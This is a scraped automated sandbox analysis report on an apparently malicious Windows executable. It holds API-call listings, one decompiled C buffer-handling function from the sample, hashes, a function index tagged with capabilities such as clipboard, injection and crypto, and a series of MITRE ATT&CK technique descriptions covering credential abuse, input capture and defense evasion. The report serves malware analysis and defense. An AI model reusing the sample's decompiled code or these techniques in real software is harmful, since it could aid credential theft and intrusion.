Part of subcall function 0040DE68: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040DECE
Part of subcall function 0040DE68: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040DF19
Part of subcall function 0040DE68: Sleep.KERNEL32(00000000,?,?), ref: 0040DF76
Part of subcall function 0040DE68: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040DFA4
Part of subcall function 0040DE68: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040DFB6

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: 3631f25cb4e2b9c9222f75840c24e29c48d743cee5ffbeb3ef9fd4013809855e
Instruction ID: d7989a48eaa67faf3bbe5dbda484f85e34b67693df98d4ab5ca55e9dc21b7096
Opcode Fuzzy Hash: 3631f25cb4e2b9c9222f75840c24e29c48d743cee5ffbeb3ef9fd4013809855e
Instruction Fuzzy Hash: 9971BC325083009FC721EF25CD45A9BB7E6AF88704F14091FF894A72D1DB79D98ACB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE24 Relevance: 5.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AE24(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed short _t27;
				void* _t38;

				_t38 = E00409301(_a4);
				if(_t38 > 0x3e8) {
					EnterCriticalSection(0x421da4);
					E0040868F( *0x421d34);
					 *0x421d34 =  *0x421d34 & 0x00000000;
					 *0x421da0 = 0;
					LeaveCriticalSection(0x421da4);
					return 0;
				}
				EnterCriticalSection(0x421da4);
				_t27 = ( *0x421da0 & 0x0000ffff) + _t38;
				if(_t27 <= 0x3e8) {
					_t13 = E0040861A(_t27 + _t27, 0x421d34);
					if(_t13 != 0) {
						_t13 = E004086CB( *0x421d34 + ( *0x421da0 & 0x0000ffff) * 2, _a4, _t38 + _t38);
						 *0x421da0 = _t27;
					}
				} else {
					_t13 = E0040861A(0x7d0, 0x421d34);
					if(_t13 != 0) {
						E004086CB( *0x421d34,  *0x421d34 + (( *0x421da0 & 0x0000ffff) - 0x3e8 - _t38) * 2, 0x3e8 - _t38 + 0x3e8 - _t38);
						_t13 = E004086CB(0x3e8 - _t38 + 0x3e8 - _t38 +  *0x421d34, _v8, _t38 + _t38);
						 *0x421da0 = 0x3e8;
					}
				}
				LeaveCriticalSection(0x421da4);
				return _t13;
			}

0x0041ae30
0x0041ae39
0x0041ae41
0x0041ae4d
0x0041ae52
0x0041ae5c
0x0041ae62
0x00000000
0x0041ae62
0x0041ae73
0x0041ae80
0x0041ae89
0x0041aeda
0x0041aee1
0x0041aefc
0x0041af01
0x0041af01
0x0041ae8b
0x0041ae90
0x0041ae97
0x0041aeb4
0x0041aec9
0x0041aece
0x0041aece
0x0041ae97
0x0041af0d
0x00000000

APIs

EnterCriticalSection.KERNEL32(00421DA4,?,?,?,0041B11F,?), ref: 0041AE41

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

LeaveCriticalSection.KERNEL32(00421DA4,?,?,?,0041B11F,?), ref: 0041AE62
EnterCriticalSection.KERNEL32(00421DA4,?,?,?,?,0041B11F,?), ref: 0041AE73
LeaveCriticalSection.KERNEL32(00421DA4,?,?,?,0041B11F,?), ref: 0041AF0D

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: 17128dae13e0740fcfa37811e15796332864093ea742f01eba14cb622cc2a282
Instruction ID: dfa575d1d3550fe011b4e7aca1f04d8029d02e3914bdc1d3568c14477d37ae43
Opcode Fuzzy Hash: 17128dae13e0740fcfa37811e15796332864093ea742f01eba14cb622cc2a282
Instruction Fuzzy Hash: 8421C470621110DBC710EF64EE849BA7364AFA8349B84083FF401921B1DB3D7816CB5D

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6qr4g3TReL.bin

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Protection of GUI

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: 6qr4g3TReL.exePID: 7088, Parent PID: 5340

General

Chronological Activities

Disassembly

Analysis Process: 6qr4g3TReL.exePID: 7088, Parent PID: 5340COMMON

Windows Analysis Report
6qr4g3TReL.bin

Function 0040BC79 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Function 00419B3D Relevance: 10.6, APIs: 7, Instructions: 119
memorynetworkCOMMON

Function 0040CC7A Relevance: 10.6, APIs: 7, Instructions: 64
COMMON

Function 0041A920 Relevance: 9.1, APIs: 6, Instructions: 90
sleepCOMMON

Function 00406765 Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 393
libraryloaderwindowCOMMON

Function 0041A5E9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 240
synchronizationsleepshutdownCOMMON

Function 00414625 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Function 00409FB8 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Function 0041119E Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 670
synchronizationnetworkCOMMONCrypto

Function 0041AFC2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107
windowCOMMON

Function 00413E51 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
libraryloaderCOMMON

Function 00406F0A Relevance: 12.1, APIs: 8, Instructions: 120
encryptiontimeCOMMON

Function 0040DE68 Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Function 00409D62 Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Function 00413091 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Function 0041B12F Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Function 0040DDAD Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Function 004078C6 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 136
stringCOMMON

Function 0040D02B Relevance: 6.1, APIs: 4, Instructions: 96
memoryinjectionCOMMON

Function 00409D0E Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Function 004070CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Function 00414D4D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
shutdownCOMMON

Function 0041A3A6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
shutdownCOMMON

Function 0040A436 Relevance: 3.1, APIs: 2, Instructions: 62
filesynchronizationnetworkCOMMON

Function 00419513 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 00406CAF Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 0040EBA9 Relevance: 1.5, APIs: 1, Instructions: 43
comCOMMON

Function 004087B9 Relevance: 1.5, APIs: 1, Instructions: 21
timeCOMMON

Function 00401DBB Relevance: .2, Instructions: 236
COMMONCrypto

Function 0040B394 Relevance: .2, Instructions: 190
COMMONCrypto

Function 00409934 Relevance: .1, Instructions: 72
COMMONCrypto

Function 00416025 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Function 00419713 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 86
COMMON

Function 00407322 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 195
COMMON

Function 0041B3A3 Relevance: 25.7, APIs: 17, Instructions: 204
filewindowregistryCOMMON

Function 00412C21 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 183
networkCOMMON

Function 0041BAB5 Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Function 0040C38A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 0040644C Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 252
COMMON

Function 0041B60D Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Function 00404B7E Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 275
threadwindowCOMMON

Function 0040A37C Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67
networkCOMMON

Function 00416806 Relevance: 15.1, APIs: 10, Instructions: 102
synchronizationwindowthreadCOMMON

Function 00419A22 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
fileCOMMON

Function 00416DD3 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Function 00406131 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 248
COMMON

Function 004126FA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 366
timenetworkCOMMON